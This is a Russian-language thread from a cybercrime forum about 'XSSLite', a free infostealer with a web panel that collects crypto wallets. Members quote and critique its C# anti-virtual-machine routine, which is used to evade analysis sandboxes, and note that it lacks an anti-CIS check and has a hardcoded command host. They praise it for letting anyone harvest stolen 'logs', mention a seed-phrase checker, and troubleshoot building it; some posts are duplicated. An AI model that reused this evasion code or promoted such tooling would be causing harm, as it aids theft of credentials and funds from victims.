• XSS.stack #1 – первый литературный журнал от юзеров форума

malware XSSLite Стиллер с веб панелью и сбором крипты

Бегло осмотрел код клиента, для опенсорса как пример пойдет, найденные недостатки - отсутствие антиснг, хардкодед ссылка на хост (умер вдс, прощаемся с логами со старых билдов), а также этот метод анти вм
C#:
public static void CheckVM()
        {
            var blacklisted = new List<string>()
            {
                "Microsoft", "VirtualBox", "VMware", "Standart VGA", "Hyper-V", "Unknown"
            };
            try
            {
                var searcher = new ManagementObjectSearcher("select * from Win32_VideoController");
                foreach (var obj in searcher.Get())
                {
                    try
                    {
                        var gpu = obj["Name"]?.ToString();
                        if (gpu != null && blacklisted.Any(x => gpu.StartsWith(x))) Environment.Exit(-1);
                    }
                    catch
                    {
                        Environment.Exit(-1);
                    }
                }
            }
            catch
            {
                Environment.Exit(-1);
            }
        }

Бегло осмотрел код клиента, для опенсорса как пример пойдет, найденные недостатки - отсутствие антиснг, хардкодед ссылка на хост (умер вдс, прощаемся с логами со старых билдов), а также этот метод анти вм
C#:
public static void CheckVM()
        {
            var blacklisted = new List<string>()
            {
                "Microsoft", "VirtualBox", "VMware", "Standart VGA", "Hyper-V", "Unknown"
            };
            try
            {
                var searcher = new ManagementObjectSearcher("select * from Win32_VideoController");
                foreach (var obj in searcher.Get())
                {
                    try
                    {
                        var gpu = obj["Name"]?.ToString();
                        if (gpu != null && blacklisted.Any(x => gpu.StartsWith(x))) Environment.Exit(-1);
                    }
                    catch
                    {
                        Environment.Exit(-1);
                    }
                }
            }
            catch
            {
                Environment.Exit(-1);
            }
        }

Можешь предложить другой метод, с удовольствием изучу, мне интересно

С сорцами да ещё и дотнет! ждём на форуме продавцов новейших приватных стиллеров в аренду за 5000$ в месяц

С сорцами да ещё и дотнет! ждём на форуме продавцов новейших приватных стиллеров в аренду за 5000$ в месяц
Не думаю что админ таких пропустит вообще) А вот на зеленке по любому появятся такие)

хелпаните кто нибудь, netframework установлен. решение найти не могу
Серьезность Код Описание Проект Файл Строка Состояние подавления
Ошибка не найдены ссылочные сборки для .NETFramework,Version=v4.8. Чтобы устранить эту проблему, установите пакет разработчика (пакет SDK или пакет нацеливания) для этой версии платформы или перенацельте приложение. Пакеты разработчика для платформы .NET Framework можно скачать на странице https://aka.ms/msbuild/developerpacks. Client

хелпаните кто нибудь, netframework установлен. решение найти не могу
Серьезность Код Описание Проект Файл Строка Состояние подавления
Ошибка не найдены ссылочные сборки для .NETFramework,Version=v4.8. Чтобы устранить эту проблему, установите пакет разработчика (пакет SDK или пакет нацеливания) для этой версии платформы или перенацельте приложение. Пакеты разработчика для платформы .NET Framework можно скачать на странице https://aka.ms/msbuild/developerpacks. Client
Скриншот бы хоть кинул. Ну а так, если пишет что нет фреймворка 4.8, значит его нет

Зачем вы слюнями брызжете? Понятное дело что можно было бы лучше. Автор дал возможность буквально любому участнику форума БЕЗ ВЛОЖЕНИЙ И ЗНАНИЙ начать добывать себе логи, это просто манна небесная. Жирный респект

Зачем вы слюнями брызжете? Понятное дело что можно было бы лучше. Автор дал возможность буквально любому участнику форума БЕЗ ВЛОЖЕНИЙ И ЗНАНИЙ начать добывать себе логи, это просто манна небесная. Жирный респект
Я прям уверен что в пятерку призовых мест войдет

Спасибо за поддержку. Особенно позабавили фразы "ты это не за бесплатно делаешь а за 20к баксов", хотя участие не гарантирует победу и уж тем более все 20к на мой кошелек. Да и к тому же софт бесплатен т.к люди которые смотря тему, не платят за этот проект. Первый свой проект я вообще выложил не в конкурс, но админ предложил поучавствовать, так что все сурсы которые у меня в конкурсе и так бы вышли на этом форуме

я сейчас работаю над чекером сидок) благо на питоне есть простая либа для этого
Хороший проект

Последнее редактирование:
Автор дал возможность буквально любому участнику форума БЕЗ ВЛОЖЕНИЙ И ЗНАНИЙ начать добывать себе логи, это просто манна небесная. Жирный респект

я 2 часа уже пытаюсь его запустить. каждый раз разные ошибки
так вот ты какая, манна небесная :D

все по инструкции. от и до. каким образом я мог что то сломать?
Откуда мне знать) ошибку посмотри, там ясно написано что в конфиге проблема, напиши в лс и я посмотрю твои скрины (хоть я и не обязан)

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх